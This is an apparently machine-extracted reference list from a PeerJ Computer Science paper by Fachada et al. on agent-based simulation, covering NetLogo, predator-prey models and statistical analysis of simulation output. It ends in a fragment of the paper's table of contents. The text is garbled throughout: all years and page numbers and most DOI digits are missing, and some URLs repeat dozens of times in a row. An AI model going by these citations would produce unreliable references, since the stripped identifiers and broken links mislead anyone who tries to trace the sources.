http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://www.me.mtu.edu/~rmdsouza/papers/ /sugarscape_gpu.pdf http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ecolmodel. . . http://dx.doi.org/ . /jasss. http://dx.doi.org/ . /opre. . . http://dx.doi.org/ . /peerj-cs. law am. . statistical analysis of simulation output data: the practical state of the art. in: simulation conference, winter. piscataway: ieee, – . law am. . simulation modeling and analysis. th edition. new york: mcgraw-hill. lotka a. . elements of physical biology. philadelphia: lippincott williams and wilkins. lysenko m, d’souza r. . a framework for megascale agent based model simulations on graphics processing units. journal of artificial societies and social simulation ( ): . lytinen sl, railsback sf. . the evolution of agent-based simulation platforms: a review of netlogo . and relogo. in: proceedings of the fourth international symposium on agent-based modeling and simulation, vienna, austria. available at http://www .econ.iastate.edu/tesfatsi/ netlogorelogoreview.lytinenrailsback .pdf. macal cm, north mj. . agent-based modeling and simulation: abms examples. in: proceedings of the th conference on winter simulation, wsc’ . williston: winter simulation conference foundation, – . macal c, north m. . tutorial on agent-based modelling and simulation. journal of simulation ( ): – doi . /jos. . . martin bt, zimmer ei, grimm v, jager t. . dynamic energy budget theory meets individual-based modelling: a generic and accessible implementation. methods in ecology and evolution ( ): – doi . /j. - x. . .x. merlone u, sonnessa m, terna p. . horizontal and vertical multiple implementations in a model of industrial districts. journal of artificial societies and social simulation ( ): . müller b, balbi s, buchmann cm, de sousa l, dressler g, groeneveld j, klassert cj, le qb, millington jda, nolzen h, parker dc, polhill jg, schlüter m, schulze j, schwarz n, sun z, taillandier p, weise h. . standardised and transparent model descriptions for agent-based models: current status and prospects. environmental modelling & software : – doi . /j.envsoft. . . . nakayama mk. . statistical analysis of simulation output. in: proceedings of the th conference on winter simulation, wsc’ . williston: winter simulation conference foundation, – . ottino-loffler j, rand w, wilensky u. . co-evolution of predators and prey in a spatial model. in: gecco . new york: sigevo. park hm. . univariate analysis and normality test using sas, stata, and spss. working paper. the university information technology services (uits) center for statistical and mathematical computing, indiana university. available at http://education.exeter.ac.uk/download.php? id= . radax w, rengs b. . prospects and pitfalls of statistical testing: insights from replicating the demographic prisoner’s dilemma. journal of artificial societies and social simulation ( ): doi . /jasss. . railsback s, lytinen s, grimm v. . stupidmodel and extensions: a template and teaching tool for agent-based modeling platforms. seattle: swarm development group. railsback s, lytinen s, jackson s. . agent-based simulation platforms: review and development recommendations. simulation ( ): – doi . / . razali nm, wah yb. . power comparisons of shapiro-wilk, kolmogorov-smirnov, lilliefors and anderson-darling tests. journal of statistical modeling and analytics ( ): – . reynolds c. . big fast crowds on ps . in: proceedings of the acm siggraph symposium on videogames, sandbox’ . new york: acm, – . fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://www .econ.iastate.edu/tesfatsi/netlogorelogoreview.lytinenrailsback .pdf http://dx.doi.org/ . /jos. . http://dx.doi.org/ . /j. - x. . .x http://dx.doi.org/ . /j.envsoft. . . http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://education.exeter.ac.uk/download.php?id= http://dx.doi.org/ . /jasss. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. reynolds cw. . flocks, herds and schools: a distributed behavioral model. acm siggraph computer graphics ( ): – doi . / . . rollins nd, barton cm, bergin s, janssen ma, lee a. . a computational model library for publishing model documentation and code. environmental modelling & software : – doi . /j.envsoft. . . . sallach d, mellarkod v. . interpretive agents: a heatbug reference simulation. in: proceedings of agent conference on generative social processes, models, and mechanisms. – . sanchez sm. . abc’s of output analysis. in: simulation conference proceedings, winter. vol. . piscataway: ieee, – . sargent rg. . statistical analysis of simulation output data. acm sigsim simulation digest ( ): – doi . / . . shapiro ss, wilk mb. . an analysis of variance test for normality (complete samples). biometrika ( / ): – doi . /biomet/ . - . . shook e, wang s, tang w. . a communication-aware framework for parallel spatially explicit agent-based models. international journal of geographical information science ( ): – doi . / . . . smith m. . using massively-parallel supercomputers to model stochastic spatial predator-prey systems. ecological modelling ( ): – doi . / - ( ) - . sondahl f, tisue s, wilensky u. . breeding faster turtles: progress towards a netlogo compiler. in: proceedings of the agent conference on social agents, chicago, il, usa. available at https://ccl.northwestern.edu/papers/sond tis wil breeding.pdf. standish rk. . going stupid with ecolab. simulation ( ): – doi . / . tang w, wang s. . hpabm: a hierarchical parallel simulation framework for spatially-explicit agent-based models. transactions in gis ( ): – doi . /j. - . . .x. tatara e, north m, howe t, collier n, vos j. . an introduction to repast modeling using a simple predator-prey example. in: sallach dl, macal cm, north mj, eds. proceedings of the agent conference on social agents: results and prospects, vol. anl/dis- - . chicago: argonne national laboratory and the university of chicago, – . volterra v. . fluctuations in the abundance of a species considered mathematically. nature : – doi . / a . welch pd. . on the problem of the initial transient in steady-state simulation. yorktown heights: ibm watson research center. wilensky u. . netlogo wolf sheep predation model. available at http://ccl.northwestern.edu/ netlogo/models/wolfsheeppredation. wilensky u. . netlogo. available at https://ccl.northwestern.edu/netlogo/. wilensky u. . netlogo heatbugs model. available at http://ccl.northwestern.edu/netlogo/ models/heatbugs. wilensky u. . netlogo . . user manual. evanston: northwestern university. available at http://ccl.northwestern.edu/netlogo/docs/. wilensky u, rand w. . making models match: replicating an agent-based model. journal of artificial societies and social simulation ( ): . willink r. . a confidence interval and test for the mean of an asymmetric distribution. com- munications in statistics—theory and methods ( ): – doi . /sta- . fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / . http://dx.doi.org/ . /j.envsoft. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /biomet/ . - . http://dx.doi.org/ . / . . http://dx.doi.org/ . / - ( ) - https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf https://ccl.northwestern.edu/papers/sond_tis_wil_breeding.pdf http://dx.doi.org/ . / http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . / a http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation http://ccl.northwestern.edu/netlogo/models/wolfsheeppredation https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ https://ccl.northwestern.edu/netlogo/ http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/models/heatbugs http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://ccl.northwestern.edu/netlogo/docs/ http://dx.doi.org/ . /sta- http://dx.doi.org/ . /peerj-cs. towards a standard model for research in agent-based modeling and simulation introduction background methodology overview, design concepts and details of pphpc a netlogo implementation selection of focal 